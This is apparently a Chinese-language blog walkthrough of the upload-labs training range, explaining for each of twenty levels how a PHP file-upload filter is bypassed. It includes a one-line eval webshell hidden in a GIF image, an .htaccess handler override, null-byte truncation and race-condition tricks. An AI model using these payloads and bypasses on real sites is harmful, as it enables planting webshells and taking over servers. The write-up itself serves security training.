目录

Pass-01 前端js验证

Pass-02 后端MIME验证

Pass-03 黑名单验证

Pass-04 黑名单验证.htaccess

Pass-05大小写绕过

Pass-6 空格绕过

Pass-07 点绕过

Pass-08 ::$DATA绕过

Pass-09 点+空格+点+空格绕过

Pass-10 双写绕过

Pass-11 00截断

Pass-12 00截断

Pass-13 图片马绕过

Pass-14 getimagesize()-图片马

Pass-15

Pass-16 二次渲染绕过

Pass-17 条件竞争

Pass-18

Pass-19 00截断

Pass-20

备注


Pass-01 前端js验证

尝试上传.php文件,提示不成功。只能上传图片类型的文件。

分析原因:是因为前端js拦截了,我们先将php文件后缀修改成合法的格式(.gif ),在使用burpsuite抓包,再修改.php后缀。

我们可以再upload的相应包中看一下我们是否将文件上传成功了。

可以看到我们成功的将一句话木马上传至靶场的服务器。

POST[] 中是自己的密码。

到这里以及成功了,我们可以尝试使用蚁剑连接。

Pass-02 后端MIME验证

补充知识:

Content-Type 实体头部用于指示资源的MIME类型

media type ,在响应中,Content-Type标头告诉客户端实际返回的内容的内容类型。

第一步还是尝试上传php文件

发现与第一关的提示不同,不是根据文件的后缀进行识别。

分析源码:

发现这关只是对 content-type进行判断,在burp suite中,修改content-type为允许的类型就行了。

修改content-type

上传成功。同时蚁剑也可以连接成功!

Pass-03 黑名单验证

尝试上传php文件,结合源码我们可以看出这关设置了文件后缀名黑名单,禁止上传后缀名为php的文件

我们尝试通过扩展名绕过,可以尝试phtml,php3,php4, php5, pht后缀名都可以绕过,但是前提是要在配置文件里面有这样的一句话

AddType application/x-httpd-php .php .phtml .phps .php1 .php4 .pht

这句话的意思是可以 .phtml .phps 等后缀名的文件执行 php程序

我们上传1.phtml 文件

上传成功

尝试使用蚁剑连接

Pass-04 黑名单验证.htaccess

分析源码:我们发现这一关的过滤比第三过更多了,使用第三关的方法是行不通了。

但是没有限制 .htaccess

补充知识:

.htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置.通过htaccess文件,可以实现:网页301重定向、自定义404页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能

上传内容为一下代码的文件,双引号内为你要上传的文件名。

<FilesMatch "jpg">   
        SetHandler application/x-httpd-php
</FilesMatch>

但是这个后缀名使用的前提是我们要在apachehttpd.conf中将LoadModule rewrite_module modules/mod_rewrite.so打开还有AllowOverride All        

我们先上传  .htaccess 成功后再上传 .jpg文件

Pass-05大小写绕过

我们尝试上传 .hatccess 文件,但提示 “此文件类型不允许上传!” 说明过滤了该文件。

我们查看源码:

分析发现

第五关比第四关少了strtolower,这说明我们可以尝试大小写绕过。

$file_ext = strtolower($file_ext); //转换为小写

上传 .Php 文件,发现上传成功。

Pass-6 空格绕过

分析源码:

发现本关相比较前两关少了一步首尾去空的步骤,这样的话我们可以采取空格绕过

 $file_ext = trim($file_ext); //首尾去空

我们上传 .php (点+php+空格) 的文件,上传成功。

Pass-07 点绕过

分析源码:

相比较前几关,本关少了一下一步,这样的话就可以考虑从这里入手。

 $file_name = deldot($file_name);//删除文件名末尾的点

利用windows特性,会自动去掉后缀名中最后的”.”,可在后缀名中加”.”绕过。

Pass-08 ::$DATA绕过

分析本关源码:

我们会发现本关少了去除字符串的一步,这里将是我们的入手点。

$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA

在php+windows的情况下:如果文件名+"::$DATA"会把::$DATA之后的数据当成文件流处理,不会检测后缀名.且保持"::$DATA"之前的文件名。利用windows特性,可在后缀名中加” ::$DATA”绕过。

Pass-09 点+空格+点+空格绕过

分析源码:

先将首尾去空,又去除了::$DATA又转换为小写,再删去末尾的点。这样一来我们构造文件名,使其经过过滤后得到的还是php的文件名不就行了,所以就1.php. . 就可以绕过,也就是点+空格+点+空格绕过

Pass-10 双写绕过

在分析源码前,我们可以不断地的通过burpsuite抓包模拟发送头信息,然后分析返回信息进行判断。

分析源码:

我们发现这里是将违规的后缀名全部替换成了空,但是他只替换一次,我们可以采用双写绕过。

比如  .php  -> .pphphp

我们上传的文件名为: 10.pphphp

我们查看图片连接,会发现后缀名为 .php

Pass-11 00截断

分析源码:

白名单判断

但是$img_path这个变量直接是拼接的,所以我们可以使用%00截断绕过。

$img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;

%00截断的条件是

php版本要小于5.3.4 修改php.inimagic_quotes_gpcOFF状态

修改save_path 路径,最后使用 %00 截断

Pass-12 00截断

分析源码:

用burp抓包,发现就是save_path post传参

用POST方式传参,应该也是00截断,但是不会像GET方式那样会对%00进行解码。

由于无法自行解码所以我们需要在hex中找到相对应的位置将数字修改为00

Pass-13 图片马绕过

分析源码:    $bin = fread($file, 2); //只读2字节

通过读取两个字节来确定文件类型,所以直接制作图片马即可

function getReailFileType($filename){$file = fopen($filename, "rb");$bin = fread($file, 2); //只读2字节fclose($file);$strInfo = @unpack("C2chars", $bin);    $typeCode = intval($strInfo['chars1'].$strInfo['chars2']);    $fileType = '';    switch($typeCode){      case 255216:            $fileType = 'jpg';break;case 13780:            $fileType = 'png';break;        case 7173:            $fileType = 'gif';break;default:            $fileType = 'unknown';}    return $fileType;
}$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){$temp_file = $_FILES['upload_file']['tmp_name'];$file_type = getReailFileType($temp_file);if($file_type == 'unknown'){$msg = "文件未知,上传失败!";}else{$img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$file_type;if(move_uploaded_file($temp_file,$img_path)){$is_upload = true;} else {$msg = "上传出错!";}}
}

13.jpg

GIF89a
<?php @eval($_POST['shell']);?>

然后上传,但是直接访问并不能将gif当作php来解析,因此还需要利用文件包含漏洞

写一个13.php传入,再利用它来解析图片

##include.php
<?php
/*
本页面存在文件包含漏洞,用于测试图片马是否能正常运行!
*/
header("Content-Type:text/html;charset=utf-8");
$file = $_GET['file'];
if(isset($file)){include $file;
}else{show_source(__file__);
}
?>

再结合文件包含解析利用

upload/include.php?file=upload/图片名称

Pass-14 getimagesize()-图片马

分析源码:

这一关通过getimagesize函数来获取图片信息,同样可以使用图片码绕过。

Pass-15

分析源码:

function isImage($filename){//需要开启php_exif模块$image_type = exif_imagetype($filename);switch ($image_type) {case IMAGETYPE_GIF:return "gif";break;case IMAGETYPE_JPEG:return "jpg";break;case IMAGETYPE_PNG:return "png";break;    default:return false;break;}
}$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){$temp_file = $_FILES['upload_file']['tmp_name'];$res = isImage($temp_file);if(!$res){$msg = "文件未知,上传失败!";}else{$img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$res;if(move_uploaded_file($temp_file,$img_path)){$is_upload = true;} else {$msg = "上传出错!";}}
}

这里用到php_exif模块来判断文件类型,用图片马绕过,方法同pass-13

Pass-16 二次渲染绕过

本人菜鸟请参考以下文章:

请参考这篇文章

分析源码:

判断了后缀名、content-type,以及利用imagecreatefromgif判断是否为gif图片,最后再做了一次二次渲染。

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])){// 获得上传文件的基本信息,文件名,类型,大小,临时文件路径$filename = $_FILES['upload_file']['name'];$filetype = $_FILES['upload_file']['type'];$tmpname = $_FILES['upload_file']['tmp_name'];$target_path=UPLOAD_PATH.basename($filename);// 获得上传文件的扩展名$fileext= substr(strrchr($filename,"."),1);//判断文件后缀与类型,合法才进行上传操作if(($fileext == "jpg") && ($filetype=="image/jpeg")){if(move_uploaded_file($tmpname,$target_path)){//使用上传的图片生成新的图片$im = imagecreatefromjpeg($target_path);if($im == false){$msg = "该文件不是jpg格式的图片!";@unlink($target_path);}else{//给新图片指定文件名srand(time());$newfilename = strval(rand()).".jpg";$newimagepath = UPLOAD_PATH.$newfilename;imagejpeg($im,$newimagepath);//显示二次渲染后的图片(使用用户上传图片生成的新图片)$img_path = UPLOAD_PATH.$newfilename;@unlink($target_path);$is_upload = true;}} else {$msg = "上传出错!";}}else if(($fileext == "png") && ($filetype=="image/png")){if(move_uploaded_file($tmpname,$target_path)){//使用上传的图片生成新的图片$im = imagecreatefrompng($target_path);if($im == false){$msg = "该文件不是png格式的图片!";@unlink($target_path);}else{//给新图片指定文件名srand(time());$newfilename = strval(rand()).".png";$newimagepath = UPLOAD_PATH.$newfilename;imagepng($im,$newimagepath);//显示二次渲染后的图片(使用用户上传图片生成的新图片)$img_path = UPLOAD_PATH.$newfilename;@unlink($target_path);$is_upload = true;               }} else {$msg = "上传出错!";}}else if(($fileext == "gif") && ($filetype=="image/gif")){if(move_uploaded_file($tmpname,$target_path)){//使用上传的图片生成新的图片$im = imagecreatefromgif($target_path);if($im == false){$msg = "该文件不是gif格式的图片!";@unlink($target_path);}else{//给新图片指定文件名srand(time());$newfilename = strval(rand()).".gif";$newimagepath = UPLOAD_PATH.$newfilename;imagegif($im,$newimagepath);//显示二次渲染后的图片(使用用户上传图片生成的新图片)$img_path = UPLOAD_PATH.$newfilename;@unlink($target_path);$is_upload = true;}} else {$msg = "上传出错!";}}else{$msg = "只允许上传后缀为.jpg|.png|.gif的图片文件!";}
}

Pass-17 条件竞争

分析源码:

$is_upload = false;
$msg = null;if(isset($_POST['submit'])){$ext_arr = array('jpg','png','gif');$file_name = $_FILES['upload_file']['name'];$temp_file = $_FILES['upload_file']['tmp_name'];$file_ext = substr($file_name,strrpos($file_name,".")+1);$upload_file = UPLOAD_PATH . '/' . $file_name;if(move_uploaded_file($temp_file, $upload_file)){if(in_array($file_ext,$ext_arr)){$img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;rename($upload_file, $img_path);$is_upload = true;}else{$msg = "只允许上传.jpg|.png|.gif类型文件!";unlink($upload_file);}}else{$msg = '上传出错!';}
}

这里是条件竞争,先将文件上传到服务器,然后判断文件后缀是否在白名单里,如果在则重命名,否则删除,因此我们可以上传1.php只需要在它删除之前访问即可,可以利用burp的intruder模块不断上传,然后我们不断的访问刷新该地址即可。

Pass-18

分析源码:

//index.php
$is_upload = false;
$msg = null;
if (isset($_POST['submit']))
{require_once("./myupload.php");$imgFileName =time();$u = new MyUpload($_FILES['upload_file']['name'], $_FILES['upload_file']['tmp_name'], $_FILES['upload_file']['size'],$imgFileName);$status_code = $u->upload(UPLOAD_PATH);switch ($status_code) {case 1:$is_upload = true;$img_path = $u->cls_upload_dir . $u->cls_file_rename_to;break;case 2:$msg = '文件已经被上传,但没有重命名。';break; case -1:$msg = '这个文件不能上传到服务器的临时文件存储目录。';break; case -2:$msg = '上传失败,上传目录不可写。';break; case -3:$msg = '上传失败,无法上传该类型文件。';break; case -4:$msg = '上传失败,上传的文件过大。';break; case -5:$msg = '上传失败,服务器已经存在相同名称文件。';break; case -6:$msg = '文件无法上传,文件不能复制到目标目录。';break;      default:$msg = '未知错误!';break;}
}//myupload.php
class MyUpload{
......
......
...... var $cls_arr_ext_accepted = array(".doc", ".xls", ".txt", ".pdf", ".gif", ".jpg", ".zip", ".rar", ".7z",".ppt",".html", ".xml", ".tiff", ".jpeg", ".png" );......
......
......  /** upload()**** Method to upload the file.** This is the only method to call outside the class.** @para String name of directory we upload to** @returns void**/function upload( $dir ){$ret = $this->isUploadedFile();if( $ret != 1 ){return $this->resultUpload( $ret );}$ret = $this->setDir( $dir );if( $ret != 1 ){return $this->resultUpload( $ret );}$ret = $this->checkExtension();if( $ret != 1 ){return $this->resultUpload( $ret );}$ret = $this->checkSize();if( $ret != 1 ){return $this->resultUpload( $ret );    }// if flag to check if the file exists is set to 1if( $this->cls_file_exists == 1 ){$ret = $this->checkFileExists();if( $ret != 1 ){return $this->resultUpload( $ret );    }}// if we are here, we are ready to move the file to destination$ret = $this->move();if( $ret != 1 ){return $this->resultUpload( $ret );    }// check if we need to rename the fileif( $this->cls_rename_file == 1 ){$ret = $this->renameFile();if( $ret != 1 ){return $this->resultUpload( $ret );    }}// if we are here, everything worked as planned :)return $this->resultUpload( "SUCCESS" );}
......
......
......
};

这关也存在条件竞争的问题,不过这题对文件后缀名做了白名单判断,然后会一步一步检查文件大小、文件是否存在等等,因此可以通过不断上传图片马,由于条件竞争可能来不及重命名,从而上传成功。

Pass-19 00截断

分析源码:

发现move_uploaded_file()函数中的img_path是由post参数save_name控制的,因此可以在save_name利用00截断绕过,方法同pass-12

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {if (file_exists(UPLOAD_PATH)) {$deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");$file_name = $_POST['save_name'];$file_ext = pathinfo($file_name,PATHINFO_EXTENSION);if(!in_array($file_ext,$deny_ext)) {$temp_file = $_FILES['upload_file']['tmp_name'];$img_path = UPLOAD_PATH . '/' .$file_name;if (move_uploaded_file($temp_file, $img_path)) { $is_upload = true;}else{$msg = '上传出错!';}}else{$msg = '禁止保存为该类型文件!';}} else {$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';}
}

Pass-20

分析源码:

 $file = explode('.', strtolower($file));

通过源码发现该过滤方式是以explode()函数把字符串打散为数组,end() 函数将数组内部指针指向最后一个元素,并返回该元素的值(如果成功),这里是取post参数数组中的最后一个文件名。reset() 函数将内部指针指向数组中的第一个元素并输出。可控点为save_name。save_name[3]=conn19.php,save_name[5]=jpg,$ext=jpg过白名单,

reset($file)=conn19.php $file[1]=nul,就成功上传conn19.php.(多出个点但是windows自动去掉了没影响)。还可以尝试,1=conn19,2=php,3=jpg,或者Pass19的00截断,0=conn19.php(0x00),1=jpg

备注

本人在学习过程中遇到了许多的BUG,无法解决,有点心态爆炸。但还是坚持将靶场打完,所以过程中缺少了许多实操的图片。

我参考多篇文章后写下这篇文章,所以这不能算是我的原创把。大家感兴趣的话可以点击以下连接查看参考文章:

参考文章一

参考文章二

参考文章三

upload-labs通关详解相关推荐

  1. DVWA的安装教程和通关详解

    DVWA的安装教程和通关详解 目录 一.环境搭建 1.下载和安装phpstudy 2.DVWA下载 3.DVWA安装 更改配置信息 解决爆红错误 二.Brute Force 1.LOW级别 2.Med ...

  2. sqli-labs通关详解

    sqli-labs通关详解 Less1 Less1sqlmap运用 Less2 Less2sqlmap运用 Less3 sqlmap运用 Less4 sqlmap一把梭 Less5 sqlmap直接梭 ...

  3. DVWA-SQL Injection级别通关详解

    目录 SQL Injection手工注入 low级别 Medium级别 High级别 impossible级别分析 SQL Injection手工注入 low级别 判断注入 1.判断是否存在注入. 输 ...

  4. C语言abs和labs函数详解和示例

    文章目录 1.包含头文件 2.函数声明 3.功能说明 4.示例 5.其它说明 6.获取视频教程 7.版权声明 C语言提供了一系列函数获取整数的绝对值:abs.labs.llabs. 1.包含头文件 # ...

  5. XSS-Libs通关详解

    前面写过几关,接下来就直接写思路了,不贴过多图了 xss的技巧就是找输入输出 Less1 开局先看到了get参数,而且和图片上面显示的一模一样 我们可以试试这里是不是可以进行xss注入 修改get参数 ...

  6. upload -labs通关解析及上传类型总结和思考

    Pass-01(客户端JS绕过) 客户端JS判断方法:上传一个php文件,用bp抓包,如果没抓到包就弹框说不能上传,就说明是客户端JS检测 客户端JS绕过方法: 方法一: 上传一个图片马格式为jpg, ...

  7. pikachu通关教程通关详解超详细

    pikachu通关教程佛系更新 暴力破解 跨站脚本XSS 反射型XSS(get): 反射型XSS(post): 存储型XSS: Dom型XSS(很鸡肋): xss之盲打: SQL注入 数字型: 字符型 ...

  8. 光头探长正在连接服务器,光头探长全关卡攻略汇总 全关卡通关详解

    光头探长全关卡攻略汇总,不少的小伙伴们最近也是在玩这个光头探长的游戏,许多的玩家也是觉得非常的有意思,大部分的玩家也是有卡关的问题,下面就为大家带来了全关卡攻略汇总,一起来看看吧. 光头探长全关卡攻略 ...

  9. sqli-lbs:Less-5~10通关详解

    第五关:Double Query- Single Quotes- String 1.输入?id=2看见页面如下: 输入?id=666时,发现页面发生变化 说明页面没有显示位.无法使用联合查询注入 2. ...

最新文章

  1. 【BZOJ4720】【NOIP2016】换教室
  2. 数学建模题目及论文_三道适合作为试题的数学建模题目及其评分标准
  3. 「最简单」的 Core Data 上手指南
  4. 微软Windows Community Toolkit一览
  5. 部门名称部门结构叠用_金属结构分公司三部门联合开展工会小组活动
  6. 与 python 交互
  7. mac电脑查看sublime text安装位置和复制文件路径方法:
  8. python语言的缺点-python优缺点分析及python种类
  9. 【MySQL运维】MySQL5.1升级到MySQ 5.5实战
  10. mount failed: mount failed: exit status 1
  11. php代码审计系列教程,PHP代码审计工具——Rips详细使用教程
  12. AppFabric 使用
  13. Excel操作-跳过隐藏行粘贴
  14. Python os.popen() 方法
  15. web渗透的信息收集
  16. 浅谈大数据和人工智能
  17. blowfish算法c语言,blowfish-c源代码(简陋).doc
  18. iPhone手机ipa破解补丁安装方法和ipa软件游戏安装教程(1)
  19. Windows电脑怎么格式化?
  20. 小新14pro锐龙版虚拟机启动蓝屏重启

热门文章

  1. SDUT-程序设计基础-实验4-for循环(下)
  2. springboot+vue+Elementui学生考勤在线请假系统
  3. 2019年电赛D题《简易电路特性测试仪》全过程
  4. 华为设备Telnet配置命令及注释
  5. python最大递归层次_练习题-Python的最大递归层数
  6. 金山词霸只能最大化,无法恢复小型查词界面
  7. 关于Tomcat启动失败的解决方案
  8. 感恩节如何使用 HTML + CSS 绘制火鸡(Turkey)
  9. FFmpeg转换格式与视频合并
  10. JZOJ 1008 1010